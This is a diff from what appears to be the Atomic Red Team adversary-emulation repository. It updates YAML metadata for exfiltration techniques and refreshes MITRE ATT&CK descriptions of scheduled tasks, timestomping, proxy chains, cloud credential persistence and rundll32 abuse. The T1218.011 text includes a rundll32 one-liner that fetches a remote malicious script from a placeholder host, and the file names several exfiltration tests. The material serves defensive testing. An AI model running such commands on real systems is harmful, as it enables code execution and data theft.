       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1567.002
     atomic_tests:
     - name: Exfiltrate data with rclone to cloud Storage - Mega (Windows)
@@ -99594,7 +100464,7 @@ exfiltration:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-07-14T19:47:46.912Z'
       name: Data Transfer Size Limits
       description: An adversary may exfiltrate data in fixed size chunks instead of
         whole files or limit packet sizes below certain thresholds. This approach
@@ -99617,8 +100487,6 @@ exfiltration:
       - 'Network Traffic: Network Connection Creation'
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1030
     atomic_tests:
     - name: Network-Based Data Transfer in Small Chunks
@@ -99655,7 +100523,7 @@ exfiltration:
           $file.Close()
   T1537:
     technique:
-      modified: '2024-04-11T15:53:00.577Z'
+      modified: '2024-10-15T16:08:25.344Z'
       name: Transfer Data to Cloud Account
       description: "Adversaries may exfiltrate data by transferring the data, including
         through sharing/syncing and creating backups of cloud environments, to another
@@ -99696,9 +100564,8 @@ exfiltration:
       x_mitre_platforms:
       - IaaS
       - SaaS
-      - Google Workspace
-      - Office 365
-      x_mitre_version: '1.4'
+      - Office Suite
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Cloud Storage: Cloud Storage Modification'
       - 'Snapshot: Snapshot Creation'
@@ -99746,7 +100613,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1052:
     technique:
@@ -99768,7 +100634,7 @@ exfiltration:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1052
         external_id: T1052
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T22:48:29.702Z'
       name: Exfiltration Over Physical Medium
       description: Adversaries may attempt to exfiltrate data via a physical medium,
         such as a removable drive. In certain circumstances, such as an air-gapped
@@ -99792,12 +100658,10 @@ exfiltration:
       x_mitre_system_requirements:
       - Presence of physical medium or device
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1048.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-12T23:39:25.476Z'
       name: 'Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated
         Non-C2 Protocol'
       description: "Adversaries may steal data by exfiltrating it over an un-encrypted
@@ -99861,7 +100725,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1048.003
     atomic_tests:
     - name: Exfiltration Over Alternative Protocol - ICMP
diff --git a/atomics/T1027.004/T1027.004.md b/atomics/T1027.004/T1027.004.md
index ea1367cde0..ba41078dc3 100644
--- a/atomics/T1027.004/T1027.004.md
+++ b/atomics/T1027.004/T1027.004.md
@@ -1,6 +1,6 @@
 # T1027.004 - Obfuscated Files or Information: Compile After Delivery
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1027/004)
-<blockquote>Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
+<blockquote>Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as ilasm.exe(Citation: ATTACK IQ), csc.exe, or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
 
 Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)</blockquote>
 
diff --git a/atomics/T1053.002/T1053.002.md b/atomics/T1053.002/T1053.002.md
index 99a659aad4..773384916f 100644
--- a/atomics/T1053.002/T1053.002.md
+++ b/atomics/T1053.002/T1053.002.md
@@ -1,6 +1,6 @@
 # T1053.002 - Scheduled Task/Job: At
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1053/002)
-<blockquote>Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+<blockquote>Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
 
 On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the <code>at.allow</code> file. If the <code>at.allow</code> file does not exist, the <code>at.deny</code> file is checked. Every username not listed in <code>at.deny</code> is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the <code>at.deny</code> exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
 
diff --git a/atomics/T1053.005/T1053.005.md b/atomics/T1053.005/T1053.005.md
index 5e1bcd269b..70631a020e 100644
--- a/atomics/T1053.005/T1053.005.md
+++ b/atomics/T1053.005/T1053.005.md
@@ -1,8 +1,6 @@
 # T1053.005 - Scheduled Task/Job: Scheduled Task
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1053/005)
-<blockquote>Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111) utility can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library to create a scheduled task.
-
-The deprecated [at](https://attack.mitre.org/software/S0110) utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)), though <code>at.exe</code> can not access tasks created with <code>schtasks</code> or the Control Panel.
+<blockquote>Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111) utility can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) (WMI) to create a scheduled task. Adversaries may also utilize the Powershell Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red Team)
 
 An adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and/or to run a process under the context of a specified account (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218), adversaries have also abused the Windows Task Scheduler to potentially mask one-time execution under signed/trusted system processes.(Citation: ProofPoint Serpent)
 
diff --git a/atomics/T1055.015/T1055.015.md b/atomics/T1055.015/T1055.015.md
index 8ab54d42c8..1f9f14c82f 100644
--- a/atomics/T1055.015/T1055.015.md
+++ b/atomics/T1055.015/T1055.015.md
@@ -1,6 +1,6 @@
 # T1055.015 - Process Injection: ListPlanting
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1055/015)
-<blockquote>Adversaries may abuse list-view controls to inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. ListPlanting is a method of executing arbitrary code in the address space of a separate live process. Code executed via ListPlanting may also evade detection from security products since the execution is masked under a legitimate process.
+<blockquote>Adversaries may abuse list-view controls to inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. ListPlanting is a method of executing arbitrary code in the address space of a separate live process.(Citation: Hexacorn Listplanting) Code executed via ListPlanting may also evade detection from security products since the execution is masked under a legitimate process.
 
 List-view controls are user interface windows used to display collections of items.(Citation: Microsoft List View Controls) Information about an application's list-view settings are stored within the process' memory in a <code>SysListView32</code> control.
 
diff --git a/atomics/T1070.006/T1070.006.md b/atomics/T1070.006/T1070.006.md
index 500844b3d3..bd98f45157 100644
--- a/atomics/T1070.006/T1070.006.md
+++ b/atomics/T1070.006/T1070.006.md
@@ -1,6 +1,12 @@
 # T1070.006 - Indicator Removal on Host: Timestomp
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1070/006)
-<blockquote>Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
+<blockquote>Adversaries may modify file time attributes to hide new files or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder and blend malicious files with legitimate files.
+
+Both the `$STANDARD_INFORMATION` (`$SI`) and `$FILE_NAME` (`$FN`) attributes record times in a Master File Table (MFT) file.(Citation: Inversecos Timestomping 2022) `$SI` (dates/time stamps) is displayed to the end user, including in the File System view, while `$FN` is dealt with by the kernel.(Citation: Magnet Forensics)
+
+Modifying the `$SI` attribute is the most common method of timestomping because it can be modified at the user level using API calls. `$FN` timestomping, however, typically requires interacting with the system kernel or moving or renaming a file.(Citation: Inversecos Timestomping 2022)
+
+Adversaries modify timestamps on files so that they do not appear conspicuous to forensic investigators or file analysis tools. In order to evade detections that rely on identifying discrepancies between the `$SI` and `$FN` attributes, adversaries may also engage in “double timestomping” by modifying times on both attributes simultaneously.(Citation: Double Timestomping)
 
 Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)</blockquote>
 
diff --git a/atomics/T1071/T1071.md b/atomics/T1071/T1071.md
index 81bb741f40..37339a8be0 100644
--- a/atomics/T1071/T1071.md
+++ b/atomics/T1071/T1071.md
@@ -2,7 +2,7 @@
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1071)
 <blockquote>Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. 
 
-Adversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.(Citation: Mandiant APT29 Eye Spy Email Nov 22) </blockquote>
+Adversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, DNS, or publishing/subscribing. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.(Citation: Mandiant APT29 Eye Spy Email Nov 22) </blockquote>
 
 ## Atomic Tests
 
diff --git a/atomics/T1072/T1072.md b/atomics/T1072/T1072.md
index acdeb6511c..a3888fa299 100644
--- a/atomics/T1072/T1072.md
+++ b/atomics/T1072/T1072.md
@@ -4,7 +4,7 @@
 
 Access to network-wide or enterprise-wide endpoint management software may enable an adversary to achieve remote code execution on all connected systems. The access may be used to laterally move to other systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints.
 
-SaaS-based configuration management services may allow for broad [Cloud Administration Command](https://attack.mitre.org/techniques/T1651) on cloud-hosted instances, as well as the execution of arbitrary commands on on-premises endpoints. For example, Microsoft Configuration Manager allows Global or Intune Administrators to run scripts as SYSTEM on on-premises devices joined to Azure AD.(Citation: SpecterOps Lateral Movement from Azure to On-Prem AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001) to communicate back to adversary owned infrastructure.(Citation: Mitiga Security Advisory: SSM Agent as Remote Access Trojan)
+SaaS-based configuration management services may allow for broad [Cloud Administration Command](https://attack.mitre.org/techniques/T1651) on cloud-hosted instances, as well as the execution of arbitrary commands on on-premises endpoints. For example, Microsoft Configuration Manager allows Global or Intune Administrators to run scripts as SYSTEM on on-premises devices joined to Entra ID.(Citation: SpecterOps Lateral Movement from Azure to On-Prem AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001) to communicate back to adversary owned infrastructure.(Citation: Mitiga Security Advisory: SSM Agent as Remote Access Trojan)
 
 Network infrastructure devices may also have configuration management tools that can be similarly abused by adversaries.(Citation: Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation)
 
diff --git a/atomics/T1087.002/T1087.002.md b/atomics/T1087.002/T1087.002.md
index 115b35bfae..574c0a6440 100644
--- a/atomics/T1087.002/T1087.002.md
+++ b/atomics/T1087.002/T1087.002.md
@@ -2,7 +2,7 @@
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1087/002)
 <blockquote>Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior such as targeting specific accounts which possess particular privileges.
 
-Commands such as <code>net user /domain</code> and <code>net group /domain</code> of the [Net](https://attack.mitre.org/software/S0039) utility, <code>dscacheutil -q group</code>on macOS, and <code>ldapsearch</code> on Linux can list domain users and groups. [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets including <code>Get-ADUser</code> and <code>Get-ADGroupMember</code> may enumerate members of Active Directory groups.(Citation: CrowdStrike StellarParticle January 2022)  </blockquote>
+Commands such as <code>net user /domain</code> and <code>net group /domain</code> of the [Net](https://attack.mitre.org/software/S0039) utility, <code>dscacheutil -q group</code> on macOS, and <code>ldapsearch</code> on Linux can list domain users and groups. [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets including <code>Get-ADUser</code> and <code>Get-ADGroupMember</code> may enumerate members of Active Directory groups.(Citation: CrowdStrike StellarParticle January 2022)  </blockquote>
 
 ## Atomic Tests
 
diff --git a/atomics/T1090.003/T1090.003.md b/atomics/T1090.003/T1090.003.md
index c8202f1d08..d90e1a03c6 100644
--- a/atomics/T1090.003/T1090.003.md
+++ b/atomics/T1090.003/T1090.003.md
@@ -2,9 +2,9 @@
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1090/003)
 <blockquote>Adversaries may chain together multiple proxies to disguise the source of malicious traffic. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source.
 
-For example, adversaries may construct or use onion routing networks – such as the publicly available [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted C2 traffic through a compromised population, allowing communication with any device within the network.(Citation: Onion Routing)
+For example, adversaries may construct or use onion routing networks – such as the publicly available [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted C2 traffic through a compromised population, allowing communication with any device within the network.(Citation: Onion Routing) Adversaries may also use operational relay box (ORB) networks composed of virtual private servers (VPS), Internet of Things (IoT) devices, smart devices, and end-of-life routers to obfuscate their operations. (Citation: ORB Mandiant) 
 
-In the case of network infrastructure, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)). By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001) on routers, adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method allowing the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s Wide-Area Network (WAN).  Protocols such as ICMP may be used as a transport.
+In the case of network infrastructure, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)). By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001) on routers, adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method allowing the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s Wide-Area Network (WAN).  Protocols such as ICMP may be used as a transport.  
 
 Similarly, adversaries may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement routing between a decentralized network of peers.(Citation: NGLite Trojan)</blockquote>
 
diff --git a/atomics/T1098.001/T1098.001.md b/atomics/T1098.001/T1098.001.md
index a2d63e1c44..3494296ee1 100644
--- a/atomics/T1098.001/T1098.001.md
+++ b/atomics/T1098.001/T1098.001.md
@@ -2,14 +2,16 @@
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1098/001)
 <blockquote>Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment.
 
-For example, adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)
+For example, adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure / Entra ID.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)
 
 In infrastructure-as-a-service (IaaS) environments, after gaining access through [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or import their own SSH keys using either the <code>CreateKeyPair</code> or <code>ImportKeyPair</code> API in AWS or the <code>gcloud compute os-login ssh-keys add</code> command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes)
 
-Adversaries may also use the <code>CreateAccessKey</code> API in AWS or the <code>gcloud iam service-accounts keys create</code> command in GCP to add access keys to an account. If the target account has different permissions from the requesting account, the adversary may also be able to escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation: Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel 2.0) For example, in Azure AD environments, an adversary with the Application Administrator role can add a new set of credentials to their application's service principal. In doing so the adversary would be able to access the service principal’s roles and permissions, which may be different from those of the Application Administrator.(Citation: SpecterOps Azure Privilege Escalation) 
+Adversaries may also use the <code>CreateAccessKey</code> API in AWS or the <code>gcloud iam service-accounts keys create</code> command in GCP to add access keys to an account. Alternatively, they may use the <code>CreateLoginProfile</code> API in AWS to add a password that can be used to log into the AWS Management Console for [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538).(Citation: Permiso Scattered Spider 2023)(Citation: Lacework AI Resource Hijacking 2024) If the target account has different permissions from the requesting account, the adversary may also be able to escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation: Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel 2.0) For example, in Entra ID environments, an adversary with the Application Administrator role can add a new set of credentials to their application's service principal. In doing so the adversary would be able to access the service principal’s roles and permissions, which may be different from those of the Application Administrator.(Citation: SpecterOps Azure Privilege Escalation) 
 
 In AWS environments, adversaries with the appropriate permissions may also use the `sts:GetFederationToken` API call to create a temporary set of credentials to [Forge Web Credentials](https://attack.mitre.org/techniques/T1606) tied to the permissions of the original user account. These temporary credentials may remain valid for the duration of their lifetime even if the original account’s API credentials are deactivated.
-(Citation: Crowdstrike AWS User Federation Persistence)</blockquote>
+(Citation: Crowdstrike AWS User Federation Persistence)
+
+In Entra ID environments with the app password feature enabled, adversaries may be able to add an app password to a user account.(Citation: Mandiant APT42 Operations 2024) As app passwords are intended to be used with legacy devices that do not support multi-factor authentication (MFA), adding an app password can allow an adversary to bypass MFA requirements. Additionally, app passwords may remain valid even if the user’s primary password is reset.(Citation: Microsoft Entra ID App Passwords)</blockquote>
 
 ## Atomic Tests
 
diff --git a/atomics/T1202/T1202.md b/atomics/T1202/T1202.md
index 1a02dcb70e..747b46096a 100644
--- a/atomics/T1202/T1202.md
+++ b/atomics/T1202/T1202.md
@@ -1,6 +1,6 @@
 # T1202 - Indirect Command Execution
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1202)
-<blockquote>Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)
+<blockquote>Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), Scriptrunner.exe, as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts.(Citation: VectorSec ForFiles Aug 2017)(Citation: Evi1cg Forfiles Nov 2017)(Citation: Secure Team - Scriptrunner.exe)(Citation: SS64)(Citation: Bleeping Computer - Scriptrunner.exe)
 
 Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.</blockquote>
 
diff --git a/atomics/T1204.002/T1204.002.md b/atomics/T1204.002/T1204.002.md
index 9f624dba02..d6f4af07ed 100644
--- a/atomics/T1204.002/T1204.002.md
+++ b/atomics/T1204.002/T1204.002.md
@@ -1,6 +1,6 @@
 # T1204.002 - User Execution: Malicious File
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1204/002)
-<blockquote>An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.
+<blockquote>An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, .cpl, and .reg.
 
 Adversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036) and [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to increase the likelihood that a user will open and successfully execute a malicious file. These methods may include using a familiar naming convention and/or password protecting the file and supplying instructions to a user on how to open it.(Citation: Password Protected Word Docs) 
 
diff --git a/atomics/T1218.011/T1218.011.md b/atomics/T1218.011/T1218.011.md
index 5380de78da..72225268d8 100644
--- a/atomics/T1218.011/T1218.011.md
+++ b/atomics/T1218.011/T1218.011.md
@@ -2,7 +2,7 @@
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1218/011)
 <blockquote>Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: <code>rundll32.exe {DLLname, DLLfunction}</code>).
 
-Rundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code> and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)
+Rundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code> and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes rundll32.exe to execute.(Citation: Trend Micro CPL) For example, [ClickOnce](https://attack.mitre.org/techniques/T1127/002) can be proxied through Rundll32.exe.
 
 Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: <code>rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")"</code>  This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)
 
diff --git a/atomics/T1484.002/T1484.002.md b/atomics/T1484.002/T1484.002.md
index b25c360bee..bb918c9997 100644
--- a/atomics/T1484.002/T1484.002.md
+++ b/atomics/T1484.002/T1484.002.md
@@ -4,7 +4,7 @@
 
 Manipulating these trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control. For example, in Microsoft Active Directory (AD) environments, this may be used to forge [SAML Tokens](https://attack.mitre.org/techniques/T1606/002) without the need to compromise the signing certificate to forge new credentials. Instead, an adversary can manipulate domain trusts to add their own signing certificate. An adversary may also convert an AD domain to a federated domain using Active Directory Federation Services (AD FS), which may enable malicious trust modifications such as altering the claim issuance rules to log in any valid set of credentials as a specified user.(Citation: AADInternals zure AD Federated Domain) 
 
-An adversary may also add a new federated identity provider to an identity tenant such as Okta, which may enable the adversary to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation 2023)</blockquote>
+An adversary may also add a new federated identity provider to an identity tenant such as Okta or AWS IAM Identity Center, which may enable the adversary to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to gain broad access into a variety of cloud-based services that leverage the identity tenant. For example, in AWS environments, an adversary that creates a new identity provider for an AWS Organization will be able to federate into all of the AWS Organization member accounts without creating identities for each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)</blockquote>
 
 ## Atomic Tests
 
diff --git a/atomics/T1485/T1485.md b/atomics/T1485/T1485.md
index 3313bfc479..a3666e02e7 100644
--- a/atomics/T1485/T1485.md
+++ b/atomics/T1485/T1485.md
@@ -6,7 +6,7 @@ Adversaries may attempt to overwrite files and directories with randomly generat
 
 To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018).
 
-In cloud environments, adversaries may leverage access to delete cloud storage, cloud storage accounts, machine images, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ  - Cisco Insider)</blockquote>
+In cloud environments, adversaries may leverage access to delete cloud storage objects, machine images, database instances, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ  - Cisco Insider)</blockquote>
 
 ## Atomic Tests
 
diff --git a/atomics/T1489/T1489.md b/atomics/T1489/T1489.md
index 5f6a9d4b7b..1b2f780987 100644
--- a/atomics/T1489/T1489.md
+++ b/atomics/T1489/T1489.md
@@ -2,7 +2,7 @@
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1489)
